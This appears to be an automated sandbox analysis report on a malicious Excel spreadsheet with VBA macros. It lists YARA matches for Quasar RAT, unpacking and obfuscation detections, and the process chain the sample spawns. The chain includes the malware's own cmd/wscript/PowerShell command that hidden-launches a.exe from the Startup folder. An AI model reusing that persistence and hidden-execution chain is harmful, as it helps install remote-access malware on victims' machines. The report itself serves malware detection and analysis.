Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD172C 13_2_02BD172C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD170F 13_2_02BD170F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD1773 13_2_02BD1773
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD175A 13_2_02BD175A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD1741 13_2_02BD1741
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD04D8 13_2_02BD04D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD04C9 13_2_02BD04C9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD3F7D 13_2_02BD3F7D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_054121F8 13_2_054121F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_054152E8 13_2_054152E8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_05411928 13_2_05411928
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_0541A710 13_2_0541A710
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_0541A6FF 13_2_0541A6FF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_054115E0 13_2_054115E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_0690BFD6 13_2_0690BFD6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_06907994 13_2_06907994
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_06E04F4F 13_2_06E04F4F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_06E03F58 13_2_06E03F58
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_06E01B88 13_2_06E01B88
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BDD250 13_2_02BDD250
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 17_2_028DC154 17_2_028DC154
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 17_2_028DE589 17_2_028DE589
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 17_2_028DE598 17_2_028DE598
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 20_2_01560740 20_2_01560740
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 20_2_0156579D 20_2_0156579D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 20_2_015604D8 20_2_015604D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 20_2_015604C9 20_2_015604C9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 20_2_01560730 20_2_01560730
Document contains embedded VBA macros
Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls OLE indicator, VBA macros: true
Yara signature match
Source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.a.exe.400000.0.unpack, oXs/KX8.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.adwa.spyw.expl.evad.winXLS@21/14@13/5
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_01
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Mutant created: \Sessions\1\BaseNamedObjects\Kdjaq
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{1430B6D9-1049-4B57-9D78-04A0226B6D97} - OProcSessId.dat
Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls OLE indicator, Workbook stream: true
Source: C:\ProgramData\a.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM WIN32_PROCESSOR
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\ProgramData\a.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\ProgramData\a.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\ProgramData\a.exe C:\PROGRAMDATA\a.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\timeout.exe timeout 4
Source: unknown Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js'
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\ProgramData\a.exe C:\PROGRAMDATA\a.exe
Source: C:\ProgramData\a.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 4
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Source: C:\ProgramData\a.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\ProgramData\a.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256f source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\CalcFis\obj\Debug\CalcFis.pdb source: a.exe, mensajeria_system[1].exe.0.dr
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp

Data Obfuscation:

.NET source code contains method to dynamically call methods (often used by packers)
Source: 13.2.a.exe.400000.0.unpack, oXs/KX8.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
.NET source code contains potential unpacker
Source: 1.2.a.exe.410000.0.unpack, Form2.cs .Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.a.exe.410000.0.unpack, Form2.cs .Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.a.exe.540000.0.unpack, Form2.cs .Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.2.a.exe.540000.0.unpack, Form2.cs .Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 12.0.a.exe.270000.0.unpack, Form2.cs .Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 12.2.a.exe.270000.0.unpack, Form2.cs .Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.a.exe.a90000.1.unpack, Form2.cs .Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.a.exe.a90000.0.unpack, Form2.cs .Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 17.2.a.exe.5b0000.0.unpack, Form2.cs .Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Yara detected Beds Obfuscator
Source: Yara match File source: 00000011.00000002.876240165.0000000007590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.715456049.0000000006E20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.789219576.0000000007530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 6200, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 6772, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 740, type: MEMORY
Source: Yara match File source: 1.2.a.exe.6e20000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.7530000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3a89990.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.7590000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3969990.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.7590000.5.raw.unpack, type: UNPACKEDPE
